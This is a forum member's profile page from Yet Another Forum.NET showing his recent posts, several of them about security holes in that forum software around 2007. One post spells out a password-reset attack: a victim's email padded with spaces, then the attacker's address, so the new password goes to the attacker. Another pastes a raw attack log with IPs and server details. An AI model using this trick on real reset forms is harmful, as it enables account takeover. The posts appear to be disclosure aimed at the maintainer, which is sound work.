Yet Another Forum.NET

Welcome Guest

Search | Active Topics | Members | Log In | Register

Yet Another Forum.NET » Members » filip_cmr

Profile: filip_cmr

WWW

About
Statistics
Avatar
Last 10 Posts
Buddies

Name:	filip_cmr (Add as buddy)
Gender:	None Specified

Joined:	Sunday, February 12, 2006(UTC)
Last Visit:	Wednesday, January 06, 2010 3:38:49 AM(UTC)
Number of Posts:	45 [0.12% of all post / 0.03 posts per day]
Number of thanks	0 (View Thanks)
Number of times this user was thanked	0
Number of posts for which this user was thanked	0

View All Posts by User

Topic: Download Yet Another Forum With Chat Posted: Tuesday, January 05, 2010 11:05:27 PM(UTC)
ddscart wrote: It bothered me big time that each time a page was loaded, the screen would scroll down to the bottom to the chat box. The “Message” input textbox had the “Setfocus” set. Goto “Chat.aspx” and at the bottom find, “setFocus('mytext');” and delete it. The forum will no longer jump to the bottom. The chat in the box disappears after some period of time, is that normal? Where is the data stored? The forum I have this in is a total test forum, so nothing good is there. Here is the chat box though. http://ddscart.org/ Nice to get credit for someone else code . That chat implementation (with setFocus) is my attempt made somewhere in 2006. Glad to see you are still stick with it, now, when there are a lot of frameworks like jQuery ....
Topic: Hacking attempts Posted: Tuesday, September 25, 2007 6:44:34 PM(UTC)
The request.UrlReferrer is taken from the request so it coul be manipulated if i mess with the request. The easy way to protect is to add this to web.config : Code: <pages validateRequest="true" viewStateEncryptionMode="Auto" enableViewStateMac="true" /> . This is an xss atempt on my forum : Code: System.Web.HttpException: The state information is invalid for this page and might be corrupted. ---> System.Web.UI.ViewStateException: Invalid viewstate. Client IP: 200.65.0.25 Port: 49677 User-Agent: Opera/9.0 (Windows NT 5.1; U; en) ViewState: /wEPDwULLTE3OTU2NDUzNTYPZBYCAgUPZBYCZg9kFgJmD2QWAgIBDxYCHgRUZXh0Bd4mPG9wdGdyb3VwIGxhYmVsPSI3IFBpVGlDaSAtIFBMQU5VTCBDQVNVVEVJIENFTE9SIDcgUElUSUNJIiBzdHlsZT0iY29sb3I6Z3JlZW47Ij48b3B0aW9uIHZhbHVlPSIyMjMiIHN0eWxlPSJjb2xvcjpibHVlOyI Q0UgR0FTSVRJIElOIENBU1VUQSBDRUxPUiA3IFBpVGlDaTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjY0IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkhFTFA8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI2MiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5QUk9QVU5FUkk8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7TUlSQUNPTFVMIFZJRVRJSSAtIERFIExBIERPUklOVEEgTEEgQkVCRSZsdDsvSSZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjEiIHN0eWxlPSJjb2xvcjpibHVlOyI UFJFQ09OQ0VQVElFPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5TQVJDSU5BPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5OQVNURVJFQTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjUiIHN0eWxlPSJjb2xvcjpibHVlOyI SU5GTyBTUElUQUxFIHNpIERPQ1RPUkk8L29wdGlvbj48L29wdGdyb3Vw... ---> System.FormatException: Invalid length for a Base-64 char array. at System.Convert.FromBase64String(String s) at System.Web.UI.ObjectStateFormatter.Deserialize(String inputString) at System.Web.UI.ObjectStateFormatter.System.Web.UI.IStateFormatter.Deserialize(String serializedState) at System.Web.UI.Util.DeserializeWithAssert(IStateFormatter formatter, String serializedState) at System.Web.UI.HiddenFieldPageStatePersister.Load() --- End of inner exception stack trace --- --- End of inner exception stack trace --- at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) at System.Web.UI.HiddenFieldPageStatePersister.Load() at System.Web.UI.Page.LoadPageStateFromPersistenceMedium() at System.Web.UI.Page.LoadAllState() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest() at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) at System.Web.UI.Page.ProcessRequest(HttpContext context) at ASP.default_aspx.ProcessRequest(HttpContext context) at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) - Show quoted text - Message The state information is invalid for this page and might be corrupted. Source System.Web StackTrace at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) at System.Web.UI.HiddenFieldPageStatePersister.Load() at System.Web.UI.Page.LoadPageStateFromPersistenceMedium() at System.Web.UI.Page.LoadAllState() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest() at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) at System.Web.UI.Page.ProcessRequest(HttpContext context) at ASP.default_aspx.ProcessRequest(HttpContext context) at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) TargetSize Void ThrowError(System.Exception, System.String, System.String, Boolean) QueryString g search Form ddlForum 51 ddlResInPage 10 ddlSearchWhere 1 ddlSearchWhat 1 __VIEWSTATE /wEPDwULLTE3OTU2NDUzNTYPZBYCAgUPZBYCZg9kFgJmD2QWAgIBDxYCHgRUZXh0Bd4mPG9wdGdyb3VwIGxhYmVsPSI3IFBpVGlDaSAtIFBMQU5VTCBDQVNVVEVJIENFTE9SIDcgUElUSUNJIiBzdHlsZT0iY29sb3I6Z3JlZW47Ij48b3B0aW9uIHZhbHVlPSIyMjMiIHN0eWxlPSJjb2xvcjpibHVlOyI Q0UgR0FTSVRJIElOIENBU1VUQSBDRUxPUiA3IFBpVGlDaTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjY0IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkhFTFA8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI2MiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5QUk9QVU5FUkk8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7TUlSQUNPTFVMIFZJRVRJSSAtIERFIExBIERPUklOVEEgTEEgQkVCRSZsdDsvSSZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjEiIHN0eWxlPSJjb2xvcjpibHVlOyI UFJFQ09OQ0VQVElFPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5TQVJDSU5BPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5OQVNURVJFQTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjUiIHN0eWxlPSJjb2xvcjpibHVlOyI SU5GTyBTUElUQUxFIHNpIERPQ1RPUkk8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7U0NPQUxBIFBBUklOVElMT1ImbHQ7L0kmZ3Q7Jmx0Oy9CJmd0OyIgc3R5bGU9ImNvbG9yOmdyZWVuOyI PG9wdGlvbiB2YWx1ZT0iMyIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5DT1BJTFVMIE1FVSAtIENFIEVEVUNBVElFIElJIERBVSA/PC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTMiIHN0eWxlPSJjb2xvcjpibHVlOyI Q09QSUxVTCBNRVUgLSBWUkVBVSBTQSBGSVUgVU4gUEFSSU5URSBNQUkgQlVOPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTUiIHN0eWxlPSJjb2xvcjpibHVlOyI UFNJSE9MT0dJQSBDT1BJTFVMVUk8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI1NCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5DT1BJTFVMIE1FVSwgQkVCRUxVU1VMIFRBVSAtIERFIExBIFBBUklOVEkgUEVOVFJVIDwvb3B0aW9uPjwvb3B0Z3JvdXA PG9wdGdyb3VwIGxhYmVsPSImbHQ7QiZndDsmbHQ7SSZndDtDT1BJSUkgLSBJWlZPUiBERSBCVUNVUklFJmx0Oy9JJmd0OyZsdDsvQiZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjE2IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkRFU1BSRSBDT1BJSSAtIDAgLSAxIEFOPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTciIHN0eWxlPSJjb2xvcjpibHVlOyI REVTUFJFIENPUElJIC0gMSAtIDIgQU5JPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTgiIHN0eWxlPSJjb2xvcjpibHVlOyI REVTUFJFIENPUElJIC0gMiAtIDQgQU5JPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNjkiIHN0eWxlPSJjb2xvcjpibHVlOyI Q09QSUkgREUgR1JBRElOSVRBIFNJIFNDT0FMQTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjE3OSIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5BRE9MRVNDRU5USUk8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7U0FOQVRBVEUgLSBDQU1FUkEgREUgR0FSREEmbHQ7L0kmZ3Q7Jmx0Oy9CJmd0OyIgc3R5bGU9ImNvbG9yOmdyZWVuOyI PG9wdGlvbiB2YWx1ZT0iNTUiIHN0eWxlPSJjb2xvcjpibHVlOyI U0FOQVRBVEU8L29wdGlvbj48b3B0aW9uIHZhbHVlPSIxNjEiIHN0eWxlPSJjb2xvcjpibHVlOyI Q09SUFVMIFVNQU4gLSBTSVNURU1FPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTUwIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPlNUT01BVE9MT0dJRTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjEzNyIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5DSElSVVJHSUUgUExBU1RJQ0E8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7Q0xVQiA3IFBJVElDSSZsdDsvSSZndDsmbHQ7L0ImZ3Q7IiBzdHlsZT0iY29sb3I6Z3JlZW47Ij48b3B0aW9uIHZhbHVlPSI1OCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5DTFVCVUwgUElUSUNJTE9SIElOREVNQU5BVElDSSAtIExVQ1JVIERFIE1BTkE8L29wdGlvbj48b3B0aW9uIHZhbHVlPSIyMjUiIHN0eWxlPSJjb2xvcjpibHVlOyI Q0xVQlVMIE1BTUlDSUxPUiBNT0RFUk5FPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNjgiIHN0eWxlPSJjb2xvcjpibHVlOyI Q0xVQiBGRU1JTkEgLVVOSUNBLCBGRU1FSUEsIEVBLCBFVkEsIE1BTUkgLVRIRSBPTkU8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI4MSIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5IT1JPU0NPUDwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjIyNCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij43IFBJVElDSSAtIEhPQkJZPC9vcHRpb24 PC9vcHRncm91cD48b3B0Z3JvdXAgbGFiZWw9IiZsdDtCJmd0OyZsdDtJJmd0O1RPVFVMIERFU1BSRSBDQVNBIFNJIEdSQURJTkEmbHQ7L0kmZ3Q7Jmx0O0ImZ3Q7IiBzdHlsZT0iY29sb3I6Z3JlZW47Ij48b3B0aW9uIHZhbHVlPSI3MiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5DQVNBIE1FQTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjczIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkdSQURJTkEgTUVBPC9vcHRpb24 PC9vcHRncm91cD48b3B0Z3JvdXAgbGFiZWw9IiZsdDtCJmd0OyZsdDtJJmd0O0NPTlNJTElFUkkgNyBQSVRJQ0kmbHQ7L0kmZ3Q7Jmx0Oy9CJmd0OyIgc3R5bGU9ImNvbG9yOmdyZWVuOyI PG9wdGlvbiB2YWx1ZT0iMjM2IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkNvbnN1bHRhbnRhIHJlc3Vyc2UgdW1hbmUgc2kgcHNpaG9sb2dpYSBtdW5jaWk8L29wdGlvbj48b3B0aW9uIHZhbHVlPSIyNDAiIHN0eWxlPSJjb2xvcjpibHVlOyI Q29uc3VsdGFudGEgYmFuY2FyYTwvb3B0aW9uPjwvb3B0Z3JvdXA PG9wdGdyb3VwIGxhYmVsPSImbHQ7QiZndDsmbHQ7SSZndDtFVkVOSU1FTlRFTEUgQ09NVU5JVEFUSUkgNyBQaVRpQ2kmbHQ7L0kmZ3Q7Jmx0Oy9CJmd0OyIgc3R5bGU9ImNvbG9yOmdyZWVuOyI PG9wdGlvbiB2YWx1ZT0iNDUiIHN0eWxlPSJjb2xvcjpibHVlOyI U0FSQkFUT1JJPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTEwIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPiZsdDtJJmd0O0NBTEVOREFSIFJFTElHSU9TJmx0Oy9JJmd0Ozwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjUyIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkNBU0FUT1JJRTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjUzIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkJPVEVaPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNzYiIHN0eWxlPSJjb2xvcjpibHVlOyI TkVXU0xFVFRFUiA3IFBpVGlDaTwvb3B0aW9uPjwvb3B0Z3JvdXA PG9wdGdyb3VwIGxhYmVsPSImbHQ7QiZndDsmbHQ7SSZndDtDQU1FUkEgREUgUkVMQVhBUkUmbHQ7L0kmZ3Q7Jmx0Oy9CJmd0OyIgc3R5bGU9ImNvbG9yOmdyZWVuOyI PG9wdGlvbiB2YWx1ZT0iNjEiIHN0eWxlPSJjb2xvcjpibHVlOyI QmFuY3VyaSwgR2x1bWUsIEx1Y3J1cmkgdHJhem5pdGUgc2F1IGhhemxpaTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9Ijc1IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkhhaSBzYSBmaW0gZGluIG5vdSBjb3BpaSAhPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNzkiIHN0eWxlPSJjb2xvcjpibHVlOyI Q3JlYXRpaWxlIG5vYXN0cmU8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7TEVDVElJIERFIFZJQVRBLCBMRUNUSUkgREUgU0NPQUxBJmx0Oy9JJmd0OyZsdDsvQiZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjcwIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkRpbiBub3UgbGEgc2NvYWxhPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNzEiIHN0eWxlPSJjb2xvcjpibHVlOyI TGVjdGlpIGRlIHZpYXRhPC9vcHRpb24 PC9vcHRncm91cD48b3B0Z3JvdXAgbGFiZWw9IiZsdDtiJmd0OyZsdDtpJmd0O0EgMy1hIFBMQU5FVEEgREUgTEEgU09BUkUmbHQ7L0kmZ3Q7Jmx0Oy9iJmd0OyIgc3R5bGU9ImNvbG9yOmdyZWVuOyI PG9wdGlvbiB2YWx1ZT0iMjQxIiBzdHlsZT0iY29sb3I6Ymx1ZTsiPlRyYWRpdGlpIHNpIG9iaWNlaXVyaTwvb3B0aW9uPjwvb3B0Z3JvdXA PG9wdGdyb3VwIGxhYmVsPSImbHQ7QiZndDsmbHQ7SSZndDtESVZFUlNFJmx0Oy9JJmd0OyZsdDsvQiZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjIxMSIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5VdGlsZTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjIxNiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5BbnVudHVyaSB1bWFuaXRhcmU8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI0MyIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5Tb2NpYWwsIGN1bHR1cmFsPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMTQ2IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkxlZ2lzbGF0aWU8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI1MSIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5CYXphcjwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjU3IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkRpdmVyc2U8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7QURNSU5JU1RSQVJFJmx0Oy9JJmd0OyZsdDsvQiZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjQ5IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPlJFR1VMQU1FTlQ8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI0OCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5QUk9CTEVNRSBURUhOSUNFPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNTAiIHN0eWxlPSJjb2xvcjpibHVlOyI QU5VTlRVUkk8L29wdGlvbj48b3B0aW9uIHZhbHVlPSIxNjciIHN0eWxlPSJjb2xvcjpibHVlOyI VFJBU0g8L29wdGlvbj48b3B0aW9uIHZhbHVlPSIxNjgiIHN0eWxlPSJjb2xvcjpibHVlOyI QVJISVZBPC9vcHRpb24 PC9vcHRncm91cD5kGAMFEWN0bDA1JGN0bDAwJGN0bDAwDxQrAQNmZmZkBRFjdGwwNSRjdGwwMCRQYWdlcg8UKwEDZmZmZAUVY3RsMDUkY3RsMDAkUGFnZUxpbmtzDzK/CwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdAgAAAAkCAAAAAwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAACAAAAA QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQEGBQAAABUvZGVmYXVsdC5hc3B4P2c9Zm9ydW0GBgAAACZGb3J1bSBkaXNjdXRpaSBkZXNwcmUgY29waWkgLSA3IFBpdGljaQH5/////P///wYIAAAAFi9kZWZhdWx0LmFzcHg/Zz1zZWFyY2gGCQAAAAVDYXV0YQtk txtSearchString best search engines law porn movie ,best search engines law porn movie ,best search engines law porn movie ,best search engines law porn movie ,best search engines law porn movie ,http://dzheker-top-top.blogspot.com ServerVariables ALL_HTTP HTTP_PRAGMA:no-cache HTTP_VIA:1.1 cache-mex-sanjuan-1 (NetCache NetApp/5.4R2D2) HTTP_CONTENT_LENGTH:9528 HTTP_CONTENT_TYPE:application/x-www-form-urlencoded HTTP_ACCEPT:/ HTTP_EXPECT:100-continue HTTP_HOST:forum.top-solutions.ro HTTP_REFERER:http://forum.top-solutions.ro/default.aspx?g=search HTTP_USER_AGENT:Opera/9.0 (Windows NT 5.1; U; en) HTTP_X_FORWARDED_FOR:75.126.21.170 HTTP_X_REWRITE_URL:/default.aspx?g=search ALL_RAW Pragma: no-cache Via: 1.1 cache-mex-sanjuan-1 (NetCache NetApp/5.4R2D2) Content-Length: 9528 Content-Type: application/x-www-form-urlencoded Accept: / Expect: 100-continue Host: forum.top-solutions.ro Referer: http://forum.top-solutions.ro/default.aspx?g=search User-Agent: Opera/9.0 (Windows NT 5.1; U; en) X-Forwarded-For: 75.126.21.170 X-Rewrite-URL: /default.aspx?g=search APPL_MD_PATH /LM/w3svc/1012405505/root APPL_PHYSICAL_PATH H:\Home\WU_001054_e4a68e7a5868b5ee530b64f0c7b73cfc\Webs\top-solutions.ro\forum\ AUTH_TYPE AUTH_USER AUTH_PASSWORD LOGON_USER REMOTE_USER CERT_COOKIE CERT_FLAGS CERT_ISSUER CERT_KEYSIZE CERT_SECRETKEYSIZE CERT_SERIALNUMBER CERT_SERVER_ISSUER CERT_SERVER_SUBJECT CERT_SUBJECT CONTENT_LENGTH 9528 CONTENT_TYPE application/x-www-form-urlencoded GATEWAY_INTERFACE CGI/1.1 HTTPS off HTTPS_KEYSIZE HTTPS_SECRETKEYSIZE HTTPS_SERVER_ISSUER HTTPS_SERVER_SUBJECT INSTANCE_ID 1012405505 INSTANCE_META_PATH /LM/W3SVC/1012405505 LOCAL_ADDR 88.86.103.168 PATH_INFO /default.aspx PATH_TRANSLATED H:\Home\WU_001054_e4a68e7a5868b5ee530b64f0c7b73cfc\Webs\top-solutions.ro\forum\default.aspx QUERY_STRING g=search REMOTE_ADDR 200.65.0.25 REMOTE_HOST 200.65.0.25 REMOTE_PORT 49677 REQUEST_METHOD POST SCRIPT_NAME /default.aspx SERVER_NAME forum.top-solutions.ro SERVER_PORT 80 SERVER_PORT_SECURE 0 SERVER_PROTOCOL HTTP/1.1 SERVER_SOFTWARE Microsoft-IIS/6.0 URL /default.aspx HTTP_PRAGMA no-cache HTTP_VIA 1.1 cache-mex-sanjuan-1 (NetCache NetApp/5.4R2D2) HTTP_CONTENT_LENGTH 9528 HTTP_CONTENT_TYPE application/x-www-form-urlencoded HTTP_ACCEPT / HTTP_EXPECT 100-continue HTTP_HOST forum.top-solutions.ro HTTP_REFERER http://forum.top-solutions.ro/default.aspx?g=search HTTP_USER_AGENT Opera/9.0 (Windows NT 5.1; U; en) HTTP_X_FORWARDED_FOR 75.126.21.170 HTTP_X_REWRITE_URL /default.aspx?g=search Session Application BannedIP System.Collections.Generic.Dictionary`2[System.UInt32,System.UInt32] yaf_BoardSettings.1 yaf.BoardSettings Cookies ASP.NET_SessionId ntpzcj55etge3b55b2getx45
Topic: Hacking attempts Posted: Tuesday, September 25, 2007 6:34:30 PM(UTC)
Nice check but is not enough. Maybe you can take in consideration this : http://msdn2.microsoft.com/en-us/security/aa973814.aspx
Topic: search Posted: Monday, September 24, 2007 4:00:46 AM(UTC)
I can't search on this forum. Is the search feature disabled or it is a bug ?
Topic: hack Posted: Saturday, September 08, 2007 6:15:09 AM(UTC)
You are right , my mistake. I use this coma separated, but is true not in the constructor. see http://msdn2.microsoft.com/en-us/library/5k0ddab0(vs.80).aspx on the bottom. Otherwise the comma separated is perfect.
Topic: hack Posted: Saturday, September 08, 2007 5:57:05 AM(UTC)
why not. When you form the mail you take the string i'm enter and so the to field is your address + 50 spacess + , + myadress and this is a legal to field with multiple recipients.
Topic: hack Posted: Saturday, September 08, 2007 5:45:25 AM(UTC)
Jaben, I hope you take this as a test and not as hacking attempt. I'm also currios about the technique used to change the admin pass.
Topic: hack Posted: Saturday, September 08, 2007 5:41:48 AM(UTC)
Yes it's work. I reset the pass for jaben osing recover with jaben and 'jaben@tinygecko.com_______________________________________________________ , myemailaddress@host.com'. (replace _ with spaces). I saw the message your password was send, but i do not receive the mail (maybe jaben has allready stopped the services).
Topic: Downtime Posted: Friday, September 07, 2007 8:26:49 PM(UTC)
Jaben wrote: Sorry folks... that was actually due to a bug in YAF ip banning. Nothing to do with hacking. Also, my initial thoughts about the breakin: my machinekey (for encoding viewstate) was the same as the distributed YAF release v1.9.1 (in the .config). So they were figuring out a way to manipulate the view state and then post it. Obviously, the key is no longer the one distributed and I strongly suggest everyone generate their OWN key for their web.config file, just in case: http://www.developmentno...achinekey_generator.aspx . And by the way, why do you use a custom machine key ? The only one time I need to use that was when I wrote an aplication wich run on a cluster and I need to pass authentication ticket to several distinc machines. Then is even simple. The macjinekey is usedto encript the authentication tichet they don't need to manipulate the view state. They can produce a authentication cookie on theyr machine on whatever user they want and then serve to your site. (I think ....) http://support.microsoft.com/kb/910443
Topic: hack Posted: Friday, September 07, 2007 4:14:00 PM(UTC)
One method could be this: I go to recover password; I know the user I want to hack ex: Jaben. I know his email address ( I think is somewhere in this forum) I put the user name and the correct email address and surprise, i reset the Jaben password just by provide a correct username and address. And the bug is this: when the email is send with the new password, the email is taken from "LostEmail.Text" and this can be how long I want but the stored procedure which make the verification will truncate the email to 50 characters, so if I put to the email field something like 'jaben.email@aaaa.com____________________________________________________________;my.email.adress.over.50.space.carracters@bbb.com' I will receive the new password.(substitute _ with spaces) yaf_user_recoverpassword 1,'Jaben','jaben.email@aaaa.com____________________________________________________________;my.email.adress.over.50.space.carracters@bbb.com' will give the Jaben id. I don't know if this is the method used but this is also valid. The address email must be taken also from db and not from input, and also you must put the new password in a secondary field, not just reset the user password based to some so well know data as username and email address. (sorry for my English, i hope you got the idea)

Name:

Forum Rank:

Joined

Posts

Location

YAFPro Theme Created by Jaben Cargman (Tiny Gecko)
Powered by YAF 1.9.4 RC4 | YAF © 2003-2010, Yet Another Forum.NET
This page was generated in 0.157 seconds.